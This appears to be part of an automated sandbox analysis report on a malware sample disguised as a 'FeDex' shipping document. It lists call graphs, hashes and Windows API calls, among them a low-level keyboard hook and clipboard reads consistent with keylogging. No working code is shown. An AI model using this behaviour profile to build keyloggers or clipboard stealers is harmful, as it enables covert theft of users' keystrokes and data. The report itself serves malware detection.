OleGetClipboard 41444->41450 41445 6c9c097 41445->41437 41446->41437 41447->41443 41448->41443 41449->41445 41450->41445 41452 6c9bf83 41451->41452 41454 6c9bfbb 41451->41454 41453 6c9bfb5 41452->41453 41455 6c9bff9 41452->41455 41460 6c9bf88 OleGetClipboard 41453->41460 41461 6c9bf78 OleGetClipboard 41453->41461 41454->41437 41457 6c9c079 41455->41457 41458 6c9c54f OleGetClipboard 41455->41458 41459 6c9c560 OleGetClipboard 41455->41459 41456 6c9c097 41456->41437 41457->41437 41458->41456 41459->41456 41460->41454 41461->41454 41462 6c90f70 41463 6c90f75 41462->41463 41464 6c91037 41463->41464 41467 6c91fd9 41463->41467 41473 6c91fe8 41463->41473 41468 6c91fe8 41467->41468 41469 6c928ee 41468->41469 41470 6c968e8 3 API calls 41468->41470 41479 6c9699b 41468->41479 41486 6c968f8 41468->41486 41469->41463 41470->41468 41474 6c92000 41473->41474 41475 6c928ee 41474->41475 41476 6c968e8 3 API calls 41474->41476 41477 6c968f8 2 API calls 41474->41477 41478 6c9699b 2 API calls 41474->41478 41475->41463 41476->41474 41477->41474 41478->41474 41480 6c96970 41479->41480 41481 6c969b1 41480->41481 41482 6c9fea0 2 API calls 41480->41482 41483 6c96e00 2 API calls 41480->41483 41484 6c96a05 2 API calls 41480->41484 41485 6c9feb0 2 API calls 41480->41485 41482->41480 41483->41480 41484->41480 41485->41480 41488 6c96915 41486->41488 41487 6c969b1 41488->41487 41489 6c9fea0 2 API calls 41488->41489 41490 6c96e00 2 API calls 41488->41490 41491 6c96a05 2 API calls 41488->41491 41492 6c9feb0 2 API calls 41488->41492 41489->41488 41490->41488 41491->41488 41492->41488 41241 6aa4e00 41242 6aa4e0f 41241->41242 41245 6aa452c 41242->41245 41246 6aa4537 41245->41246 41249 6aa45d4 41246->41249 41248 6aa4f06 41248->41248 41250 6aa45df 41249->41250 41251 6aa560d 41250->41251 41254 6aa6d30 41250->41254 41259 6aa6d21 41250->41259 41251->41248 41255 6aa6d51 41254->41255 41256 6aa6d75 41255->41256 41264 6aa6ee0 41255->41264 41268 6aa6ed0 41255->41268 41256->41251 41260 6aa6d51 41259->41260 41261 6aa6d75 41260->41261 41262 6aa6ee0 4 API calls 41260->41262 41263 6aa6ed0 4 API calls 41260->41263 41261->41251 41262->41261 41263->41261 41265 6aa6eed 41264->41265 41266 6aa6f26 41265->41266 41272 6aa6220 41265->41272 41266->41256 41270 6aa6ee0 41268->41270 41269 6aa6f26 41269->41256 41270->41269 41271 6aa6220 4 API calls 41270->41271 41271->41269 41273 6aa622b 41272->41273 41274 6aa6f98 41273->41274 41276 6aa6254 41273->41276 41277 6aa625f 41276->41277 41283 6aa6264 41277->41283 41279 6aa7007 41287 6aab198 41279->41287 41296 6aab191 41279->41296 41280 6aa7040 41280->41274 41286 6aa626f 41283->41286 41284 6aa733c 41284->41279 41285 6aa6d30 4 API calls 41285->41284 41286->41284 41286->41285 41289 6aab2ba 41287->41289 41290 6aab1c9 41287->41290 41288 6aab1d5 41288->41280 41289->41280 41290->41288 41304 6aab400 41290->41304 41307 6aab3f1 41290->41307 41291 6aab215 41294 6c908b8 CreateWindowExW 41291->41294 41295 6c908e0 CreateWindowExW 41291->41295 41294->41289 41295->41289 41297 6aab198 41296->41297 41298 6aab1d5 41297->41298 41300 6aab400 3 API calls 41297->41300 41301 6aab3f1 3 API calls 41297->41301 41298->41280 41299 6aab215 41302 6c908b8 CreateWindowExW 41299->41302 41303 6c908e0 CreateWindowExW 41299->41303 41300->41299 41301->41299 41302->41298 41303->41298 41311 6aab430 41304->41311 41305 6aab40a 41305->41291 41308 6aab400 41307->41308 41310 6aab430 3 API calls 41308->41310 41309 6aab40a 41309->41291 41310->41309 41320 6c9146a 41311->41320 41324 6c91470 41311->41324 41312 6aab453 41314 6aab46b 41312->41314 41319 6aab430 3 API calls 41312->41319 41328 6aab620 41312->41328 41313 6aab463 41313->41314 41332 6aaa7c4 41313->41332 41314->41305 41319->41313 41321 6c91470 GetModuleHandleW 41320->41321 41323 6c914e5 41321->41323 41323->41312 41325 6c914b8 GetModuleHandleW 41324->41325 41326 6c914b2 41324->41326 41327 6c914e5 41325->41327 41326->41325 41327->41312 41330 6aab634 41328->41330 41329 6aab659 41329->41313 41330->41329 41331 6aaa7c4 LoadLibraryExW 41330->41331 41331->41329 41333 6aab680 LoadLibraryExW 41332->41333 41335 6aab6f9 41333->41335 41335->41314 41336 6aa2520 41337 6aa2528 41336->41337 41338 6aa256d 41337->41338 41342 6aa2602 41337->41342 41346 6aa2570 41337->41346 41350 6aa2580 41337->41350 41343 6aa25bd 41342->41343 41344 6aa2610 41343->41344 41354 6aa1ed8 41343->41354 41344->41337 41348 6aa259d 41346->41348 41347 6aa2610 41347->41337 41348->41347 41349 6aa1ed8 SetWindowsHookExA 41348->41349 41349->41348 41352 6aa259d 41350->41352 41351 6aa2610 41351->41337 41352->41351 41353 6aa1ed8 SetWindowsHookExA 41352->41353 41353->41352 41355 6aa2788 SetWindowsHookExA 41354->41355 41357 6aa2812 41355->41357 41357->41343 41493 6e3e158 41494 6e3e175 41493->41494 41495 6e3e19d 41493->41495 41496 6e3e1be 41495->41496 41497 6e3e286 GlobalMemoryStatusEx 41495->41497 41498 6e3e2b6 41497->41498

                                                                                        Executed Functions

                                                                                        Function 06C98978 Relevance: 4.3, APIs: 1, Instructions: 2796COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06C9895D), ref: 06C9B907
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 40a95820598d7b32a1bb767b33e53b9688501ec571a2be22c2598f0bcba4cc47
                                                                                        • Instruction ID: 701faa8e2236cb219f060cda56c833993a957b677a99aaa65863ce0551f1a5dc
                                                                                        • Opcode Fuzzy Hash: 40a95820598d7b32a1bb767b33e53b9688501ec571a2be22c2598f0bcba4cc47
                                                                                        • Instruction Fuzzy Hash: E7530771D10B5A8ACB51EF68C884599F7B1FF99300F11D79AE0587B221EB70AAC5CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06AA1ED8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 684 6aa1ed8-6aa27d2 687 6aa27de-6aa2810 SetWindowsHookExA 684->687 688 6aa27d4-6aa27dc 684->688 689 6aa2819-6aa2839 687->689 690 6aa2812-6aa2818 687->690 688->687 690->689
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000), ref: 06AA2803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: ea32f1086c9972fd909ec4328f14b1c4ce72297df377e4344e0a18cc67f49a33
                                                                                        • Instruction ID: 3d482a16d515668942f425a05bd06506d4e693a6738ec2fa52224b91e6dff0a7
                                                                                        • Opcode Fuzzy Hash: ea32f1086c9972fd909ec4328f14b1c4ce72297df377e4344e0a18cc67f49a33
                                                                                        • Instruction Fuzzy Hash: DB211575D002099FCB54DF9AD844BEEBBF5EB98320F14842AE419B7250C774AA44CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D136B Relevance: .5, Instructions: 453COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f7748bb1180ae3ffadc10a1a62f9cf196e4be383e86bb4ce9684b8037197c5a0
                                                                                        • Instruction ID: ebca7571ca27068c186bc359732c545463273b37103b45512ee0b1e6b864d32d
                                                                                        • Opcode Fuzzy Hash: f7748bb1180ae3ffadc10a1a62f9cf196e4be383e86bb4ce9684b8037197c5a0
                                                                                        • Instruction Fuzzy Hash: D7022AB4B102058FDB54CF68C888B6ABBF1FF49710F168599E906DB3A2DA75EC41CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06E3E158 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 447 6e3e158-6e3e173 448 6e3e175-6e3e19c call 6e3ccac 447->448 449 6e3e19d-6e3e1bc call 6e3ccb8 447->449 455 6e3e1c2-6e3e221 449->455 456 6e3e1be-6e3e1c1 449->456 463 6e3e223-6e3e226 455->463 464 6e3e227-6e3e2b4 GlobalMemoryStatusEx 455->464 468 6e3e2b6-6e3e2bc 464->468 469 6e3e2bd-6e3e2e5 464->469 468->469
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525803702.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6e30000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ebed8913869dbaf2bc614b3c8b3f1b91439c216d823a81a7cc82a16dc1e6472
                                                                                        • Instruction ID: b100977780844d078e4c75f7176a002d471325faa77d29765f281ec82bde93cc
                                                                                        • Opcode Fuzzy Hash: 8ebed8913869dbaf2bc614b3c8b3f1b91439c216d823a81a7cc82a16dc1e6472
                                                                                        • Instruction Fuzzy Hash: B541F131D043AA8FCB01CFB9D85429EBFF5AF8A310F1585ABD449E7251DB789844CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C91C50 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 472 6c91c50-6c935d6 474 6c935d8-6c935de 472->474 475 6c935e1-6c935e8 472->475 474->475 476 6c935ea-6c935f0 475->476 477 6c935f3-6c93692 CreateWindowExW 475->477 476->477 479 6c9369b-6c936d3 477->479 480 6c93694-6c9369a 477->480 484 6c936e0 479->484 485 6c936d5-6c936d8 479->485 480->479 486 6c936e1 484->486 485->484 486->486
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C93682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 28017fcb31b400592690a52ab27fbc92c3754892cba7a8cbfa738788af145c1c
                                                                                        • Instruction ID: dd62dd1e5c56986baf7c0b0891a81802f80b29aa255c2ce7b70d2c51b121c124
                                                                                        • Opcode Fuzzy Hash: 28017fcb31b400592690a52ab27fbc92c3754892cba7a8cbfa738788af145c1c
                                                                                        • Instruction Fuzzy Hash: 8051A0B1D00349DFDF14CFAAC984ADEBBB5BF88310F24812AE819AB250D7759945CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C93564 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 487 6c93564-6c935d6 489 6c935d8-6c935de 487->489 490 6c935e1-6c935e8 487->490 489->490 491 6c935ea-6c935f0 490->491 492 6c935f3-6c9362b 490->492 491->492 493 6c93633-6c93692 CreateWindowExW 492->493 494 6c9369b-6c936d3 493->494 495 6c93694-6c9369a 493->495 499 6c936e0 494->499 500 6c936d5-6c936d8 494->500 495->494 501 6c936e1 499->501 500->499 501->501
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C93682
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: d1d66b794320d1618de892ebb97cf966344c5234e6002d33325faf0c3132c2e7
                                                                                        • Instruction ID: bb9eb33a62a551c2bb96761f8edf40f7465157da0af7e8ed527d64815f622e84
                                                                                        • Opcode Fuzzy Hash: d1d66b794320d1618de892ebb97cf966344c5234e6002d33325faf0c3132c2e7
                                                                                        • Instruction Fuzzy Hash: 2651B1B1D00349DFDF14CF9AC984ADEBBB5BF88310F24812AE819AB250D7749945CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 070D0130 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 502 70d0130-70d0157 503 70d0159-70d015c 502->503 504 70d015e-70d0160 503->504 505 70d0163-70d0166 503->505 504->505 506 70d0168-70d016f 505->506 507 70d0174-70d0177 505->507 506->507 508 70d0179 507->508 509 70d0188-70d018b 507->509 516 70d0180-70d0183 508->516 510 70d018d-70d0196 509->510 511 70d01a1-70d01a4 509->511 512 70d019c 510->512 513 70d025e-70d0267 510->513 514 70d01ae-70d01b1 511->514 515 70d01a6-70d01a9 511->515 512->511 517 70d026d-70d0274 513->517 518 70d0434-70d046e 513->518 519 70d01d6-70d01d9 514->519 520 70d01b3-70d01c8 514->520 515->514 516->509 521 70d0279-70d027c 517->521 534 70d0470-70d0473 518->534 522 70d01df-70d01e2 519->522 523 70d0321-70d0327 519->523 624 70d01cb call 70d0120 520->624 625 70d01cb call 70d0130 520->625 524 70d027e-70d0284 521->524 525 70d0296-70d0299 521->525 529 70d01e4-70d01fd 522->529 530 70d0202-70d0205 522->530 523->524 528 70d032d 523->528 524->518 533 70d028a-70d0291 524->533 531 70d029b-70d029d 525->531 535 70d02bd-70d02c0 525->535 536 70d0332-70d0335 528->536 529->530 530->531 532 70d020b-70d020e 530->532 541 70d029f-70d02a9 531->541 542 70d02ab 531->542 537 70d021f-70d0222 532->537 538 70d0210-70d0214 532->538 533->525 539 70d0479-70d047c 534->539 540 70d0546-70d059b 534->540 535->510 543 70d02c6-70d02c9 535->543 545 70d034c-70d034f 536->545 546 70d0337-70d0347 536->546 552 70d0259-70d025c 537->552 553 70d0224-70d024b 537->553 550 70d02cb-70d02ce 538->550 551 70d021a 538->551 554 70d047e-70d0482 539->554 555 70d0489-70d048c 539->555 613 70d059d-70d059f 540->613 556 70d02b0-70d02b2 541->556 542->556 543->550 557 70d02d3-70d02d6 543->557 544 70d01d1 544->519 548 70d03f8-70d042d 545->548 549 70d0355-70d0358 545->549 546->545 548->518 558 70d036c-70d036f 549->558 559 70d035a-70d0361 549->559 550->557 551->537 552->513 552->521 622 70d024e call 70d0120 553->622 623 70d024e call 70d0130 553->623 560 70d048e-70d04a0 554->560 561 70d0484 554->561 555->560 564 70d04b0-70d04b2 555->564 562 70d02b8 556->562 563 70d03b3-70d03c4 556->563 565 70d02d8-70d02e6 557->565 566 70d02eb-70d02ee 557->566 576 70d0371-70d037e 558->576 577 70d0383-70d0386 558->577 559->529 575 70d0367 559->575 597 70d04a8-70d04ab 560->597 561->555 562->535 563->508 587 70d03ca 563->587 573 70d04b9-70d04bc 564->573 574 70d04b4 564->574 565->566 570 70d0308-70d030b 566->570 571 70d02f0-70d0303 566->571 580 70d030d 570->580 581 70d031c-70d031f 570->581 571->570 573->534 583 70d04be-70d04fe 573->583 574->573 575->558 576->577 584 70d0388-70d038e 577->584 585 70d0393-70d0396 577->585 596 70d0314-70d0317 580->596 581->523 581->536 627 70d0500 call 70d054d 583->627 628 70d0500 call 70d0120 583->628 629 70d0500 call 70d0130 583->629 584->585 591 70d039e-70d03a1 585->591 592 70d0398-70d0399 585->592 595 70d03cf-70d03d2 587->595 599 70d03ae-70d03b1 591->599 600 70d03a3-70d03a9 591->600 592->591 602 70d03dc-70d03de 595->602 603 70d03d4-70d03d9 595->603 596->581 597->564 599->563 599->595 600->599 606 70d03e5-70d03e8 602->606 607 70d03e0 602->607 603->602 606->503 610 70d03ee-70d03f5 606->610 607->606 611 70d0254 611->552 615 70d05a6-70d05a9 613->615 616 70d05a1 613->616 614 70d0506-70d0522 619 70d052d 614->619 620 70d0524 614->620 615->613 618 70d05ab-70d05c9 call 70d05fd 615->618 616->615 621 70d05cf-70d05d0 618->621 619->540 620->619 622->611 623->611 624->544 625->544 627->614 628->614 629->614
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.526043799.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_70d0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \
                                                                                        • API String ID: 0-2967466578
                                                                                        • Opcode ID: bce6abbd91a573193f791488322f7b2b27e48d1f918f404244caa13525955d3e
                                                                                        • Instruction ID: 3c9e40370f1ae69ad1233cc15f6c15c0e01b737c5e5bc0e7f74597f912fb7a6e
                                                                                        • Opcode Fuzzy Hash: bce6abbd91a573193f791488322f7b2b27e48d1f918f404244caa13525955d3e
                                                                                        • Instruction Fuzzy Hash: 8FD160B0A0130A9FDF64CBA8C9947AEB7F5EF45310F10462AE449E7291EB75DC81CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C961E4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 630 6c961e4-6c98354 633 6c9835a-6c9835f 630->633 634 6c98404-6c98424 call 6c91c7c 630->634 636 6c98361-6c98398 633->636 637 6c983b2-6c983ea CallWindowProcW 633->637 641 6c98427-6c98434 634->641 644 6c9839a-6c983a0 636->644 645 6c983a1-6c983b0 636->645 638 6c983ec-6c983f2 637->638 639 6c983f3-6c98402 637->639 638->639 639->641 644->645 645->641
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06C983D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 20d2189329515c2a34587cd0342a553ef6509901afcb127af270fb9d66399996
                                                                                        • Instruction ID: 0c2e55f1218e1999b28dbd636399d7a08cea1d176a0679c465702548cd3dc88d
                                                                                        • Opcode Fuzzy Hash: 20d2189329515c2a34587cd0342a553ef6509901afcb127af270fb9d66399996
                                                                                        • Instruction Fuzzy Hash: EF416DB5900305DFDB50CF9AC888AAABBF5FF88314F24C859E419A7321C374A941CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9BD10 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 647 6c9bd10-6c9caa0 OleGetClipboard 650 6c9caa9-6c9caf7 647->650 651 6c9caa2-6c9caa8 647->651 656 6c9caf9-6c9cafd 650->656 657 6c9cb07 650->657 651->650 656->657 658 6c9caff 656->658 659 6c9cb08 657->659 658->657 659->659
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: 176884a66fcd203c968e1ae1e7d57dd9c06bf7d4ccd3986dc7b33f2574df7ba8
                                                                                        • Instruction ID: ab482de8b8f64ff11f8be83ec25310453856ee2a3458644faac28c32f8ea4d2e
                                                                                        • Opcode Fuzzy Hash: 176884a66fcd203c968e1ae1e7d57dd9c06bf7d4ccd3986dc7b33f2574df7ba8
                                                                                        • Instruction Fuzzy Hash: 783101B0D01248DFDB50CF9AC888BDEBBF5AB48314F248019E405BB394DBB4A945CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C9C9FC Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 660 6c9c9fc-6c9ca58 661 6c9ca62-6c9caa0 OleGetClipboard 660->661 662 6c9caa9-6c9caf7 661->662 663 6c9caa2-6c9caa8 661->663 668 6c9caf9-6c9cafd 662->668 669 6c9cb07 662->669 663->662 668->669 670 6c9caff 668->670 671 6c9cb08 669->671 670->669 671->671
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: Clipboard
                                                                                        • String ID:
                                                                                        • API String ID: 220874293-0
                                                                                        • Opcode ID: 46f7e34bb6ed764772b1eb23d12c7281f3028d8aa06eac9ad8ac3306c00b8ead
                                                                                        • Instruction ID: 4ade5fca66b0656284dfaa309d43c2f0be47704239c7f071abf3647638b65915
                                                                                        • Opcode Fuzzy Hash: 46f7e34bb6ed764772b1eb23d12c7281f3028d8aa06eac9ad8ac3306c00b8ead
                                                                                        • Instruction Fuzzy Hash: CC3110B0D00248DFDB50CF99D888BDEBBF5AB48314F248019E004BB294DB74A945CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C96F0D Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 672 6c96f0d-6c96f1a 673 6c96f20-6c96fb4 DuplicateHandle 672->673 674 6c96fbd-6c96fda 673->674 675 6c96fb6-6c96fbc 673->675 675->674
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C968BE,?,?,?,?,?), ref: 06C96FA7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: be6d4a513589a8fecf34ca5d27f2bd1568d84e57b49d57dec285afa6d49007b0
                                                                                        • Instruction ID: d319a0f4909621ab13846a6649aced725f0440d916afc0fe38da2e6570edb1a4
                                                                                        • Opcode Fuzzy Hash: be6d4a513589a8fecf34ca5d27f2bd1568d84e57b49d57dec285afa6d49007b0
                                                                                        • Instruction Fuzzy Hash: 6921D4B5D002589FDF10CFAAD984ADEBBF8EB58324F14845AE954A3250D378A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06C96084 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 678 6c96084-6c96fb4 DuplicateHandle 680 6c96fbd-6c96fda 678->680 681 6c96fb6-6c96fbc 678->681 681->680
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06C968BE,?,?,?,?,?), ref: 06C96FA7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525638011.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6c90000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 8511a49f6300d49433feca7b32c403da5c860f4926b1f168508cf6f7fa8c88b6
                                                                                        • Instruction ID: 70801facb990d8497fa26eb89068e331ed6db66db4c48acc6fb8358393beb33b
                                                                                        • Opcode Fuzzy Hash: 8511a49f6300d49433feca7b32c403da5c860f4926b1f168508cf6f7fa8c88b6
                                                                                        • Instruction Fuzzy Hash: A22105B5D002089FDF10CFAAD884ADEBBF8EB48324F14841AE914A3350D378A944CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06AA2783 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 694 6aa2783-6aa27d2 696 6aa27de-6aa2810 SetWindowsHookExA 694->696 697 6aa27d4-6aa27dc 694->697 698 6aa2819-6aa2839 696->698 699 6aa2812-6aa2818 696->699 697->696 699->698
                                                                                        APIs
                                                                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000), ref: 06AA2803
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: cc0f413bdc61c5c184d79f3295ce7d5af40253a6c96fcea34402f550a46bc04a
                                                                                        • Instruction ID: 822b18e842f3ea1a33f02c02cb30818cc358faaa700e25c1460b661b5849ebe5
                                                                                        • Opcode Fuzzy Hash: cc0f413bdc61c5c184d79f3295ce7d5af40253a6c96fcea34402f550a46bc04a
                                                                                        • Instruction Fuzzy Hash: 682127B5D002098FCB54DF99D944BEEBBF5FB88320F14842AE419B7250C778AA45CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06AAA7C4 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 703 6aaa7c4-6aab6c0 705 6aab6c8-6aab6f7 LoadLibraryExW 703->705 706 6aab6c2-6aab6c5 703->706 707 6aab6f9-6aab6ff 705->707 708 6aab700-6aab71d 705->708 706->705 707->708
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,06AAB659,00000800), ref: 06AAB6EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.525454733.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6aa0000_FeDex_shipping_document.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: da11e305dcda2af6e92a2084b3df2f05c89d7cd80371b240aaef4532bdd38583
